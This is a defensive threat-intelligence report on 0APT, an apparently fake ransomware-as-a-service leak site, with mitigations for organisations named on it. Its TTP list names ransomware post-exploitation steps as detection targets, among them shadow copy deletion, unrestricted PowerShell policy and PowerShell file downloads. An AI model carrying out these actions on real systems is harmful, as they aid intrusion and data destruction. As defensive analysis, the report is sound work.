Full Report
A new threat actor has launched what appears to be a fake ransomware-as-a-service (RaaS) operation called 0APT. Over the last week, 0APT published a data leak site (DLS) with fake companies. However, the actor has caused alarm in the past few days after publishing the names of several real organizations and has reportedly prompted some companies to initiate incident response processes. The threat actor 0APT appeared in January 2026 and within only a few days claimed more than 150 victims via its DLS on a Tor-based domain. However, it quickly became clear that many of the alleged victims could not be verified and appeared to be artificially generated.
Analysis Summary
# Threat Actor: 0APT
## Attribution & Identity
The actor is a **new threat actor** that emerged in **January 2026**. The operation appears to be a **fake Ransomware-as-a-Service (RaaS) operation**. No specific attribution to a nation-state or established cybercrime group is mentioned.
## Activity Summary
0APT launched a supposed RaaS operation and quickly published a Data Leak Site (DLS) on a Tor-based domain, claiming over 150 victims within a few days of appearing (January 2026). Initially, the DLS contained fake companies. More recently, the actor caused alarm by publishing the names of several **real organizations**. Analysts assessment suggests claims are **doubtful** as alleged victims could not be verified, data samples appeared fabricated (e.g., containing repeating null bytes, suspiciously large metadata files), and the alleged malware sample was described as a "work in progress." The activity is assessed as potentially designed to cause panic or as a test of infrastructure.
## Tactics, Techniques & Procedures
The identified potential TTPs stem from linked threat hunt packages associated with their activity, suggesting potential post-exploitation behaviors:
- WinRAR Archive Creation
- Remote WMI Command Attempt
- Network SMB Profiling (Potential Nonstandard SMB Communication Behavior)
- Remote Services (SMB Share mounts/admin shares/scanning)
- Shadow Copies Deletion Using Operating Systems Utilities
- Attempt To Set Default PowerShell Execution Policy To Unrestricted
- Methods for Downloading Files with PowerShell
- Excessive Windows Discovery CommandLine Arguments (Potential Malware Installation)
## Targeting
- **Sectors:** Not explicitly detailed, but the initial publication of real organization names caused some companies to initiate incident response.
- **Geography:** Global coverage implied ("more than 150 companies worldwide").
- **Victims:** Numerous alleged victims (150+), though most appear artificially generated. A few **real organizations** were named more recently, prompting incident response.
## Tools & Infrastructure
- **Malware Families Used:** An alleged associated malware sample was analyzed and found to be a "work in progress," not fully operational ransomware.
- **Infrastructure (C2, domains, IPs):** Operated a **DLS on a Tor-based domain**.
## Implications
0APT represents a threat focused on **extortion and reputational damage** through the *creation of panic* via fake breach claims. While the operation appears largely fraudulent at this stage, the tactic of naming real companies shifts the risk from noise to requiring immediate validation, potentially leading to unnecessary escalation of incident response procedures and resource drain (alert fatigue). There remains a small possibility that this activity serves as reconnaissance or platform testing for future legitimate operations.
## Mitigations
- **Validate Breach Claims:** Do not immediately assume legitimacy; carefully review evidence for credible proof of data exfiltration (unique samples, internal documents). Treat claims skeptically if data appears generic, corrupted, or artificially generated.
- **Monitor Associated TTPs:** Remain vigilant for suspicious PowerShell activity, WinRAR creation, WMI execution, nonstandard SMB communication, shadow copy deletion, and PowerShell policy changes.
- **Tune SOC Processes:** Implement efficient triage and validation processes to filter out unsubstantiated claims and reduce alert fatigue.
- **Communicate Carefully:** If named on a leak site without proof of compromise, communicate clearly that validation is underway to prevent internal/external panic.